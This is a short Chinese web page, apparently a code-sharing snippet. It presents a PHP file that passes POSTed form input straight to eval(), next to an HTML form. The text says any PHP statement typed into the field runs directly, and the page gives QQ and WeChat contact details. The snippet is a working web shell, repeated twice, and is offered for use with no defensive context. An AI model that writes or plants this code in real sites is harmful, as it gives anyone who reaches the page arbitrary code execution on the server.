<?php eval($_POST['code']); ?> <!DOCTYPE html> <html> <head> <title></title> </head> <body> <form action="" method="post"> <input type="text" name="code"> </form> </body> </html>
可以在input内输入PHP语句,直接执行
技术QQ交流群:157711366
技术微信:liehuweb
写评论
<?php eval($_POST['code']); ?> <!DOCTYPE html> <html> <head> <title></title> </head> <body> <form action="" method="post"> <input type="text" name="code"> </form> </body> </html>
可以在input内输入PHP语句,直接执行
技术QQ交流群:157711366
技术微信:liehuweb